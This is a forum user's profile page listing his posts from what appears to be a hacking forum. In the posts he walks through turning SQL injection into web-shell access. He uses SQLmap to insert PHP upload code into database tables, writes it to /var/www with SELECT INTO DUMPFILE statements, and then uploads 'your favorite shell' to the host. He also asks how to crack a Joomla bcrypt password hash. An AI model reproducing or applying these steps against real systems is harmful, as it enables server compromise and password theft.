DrMTR
-
Posts
7 -
Joined
-
Last visited
DrMTR's Achievements
Newbie (1/14)
-
^^ Thanks for script. Its very usefull for finding writable folders. I dont want to open a new thread, did someone know why this Joomla hash is very long compared with other hash in DB $2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB. How to crack this one.?
-
Yeah, its debian OS.
-
Yea you must have /var/www/ writable :)
-
Yeah SQL code inserted into DB table, and executes into evil php uploader. Grab the content from SQL table and dump to .php file using these command: select * into dumpfile '/var/www/uploadform.php' from userform; select * into dumpfile '/var/www/uploader.php' from user_upload; After that sumply execute uploadform.php and upload your favorite shell into host. Thanks for everything guys. :)
-
So in fact if i change "blacklighted text" into " " will be OK? insert into user_upload values (' <?php $target_path = "/var/www/"; $target_path = $target_path . basename( $_FILES["uploadedfile"]["name"]); if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path)) { echo "The file ". basename( $_FILES["uploadedfile"]["name"]). " has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } ?>');
-
Yeah its single quotes, but why then first form (htm form) inserted successfully into db, and second give me SQL error.? Can you change the quotes, and then try to insert into db table again.?
-
Hi to all ! I testing vulnerable app in localhost, and try to insert php upload form code into db table, but give me MySQL syntax error every time i tryed.. This htm form successfully inserted into DB via SQLmap insert into userform values ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <head>Upload File</head> <body> <<form enctype="multipart/form-data" action="uploader.php" method="POST"> <input type="hidden" name="MAX_FILE_SIZE" value="100000" /> Choose a file to upload: <input name="uploadedfile" type="file" /><br /> <input type="submit" value="Upload File" /> </form> </body> </html>'); but this give me SQL syntax error in line 1 every time, when try to insert into DB: insert into user_upload values (' <?php $target_path = '/var/www/'; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } ?>'); Where is the problem.? I forget to tell that DB tables are allready created into DB exploitdb.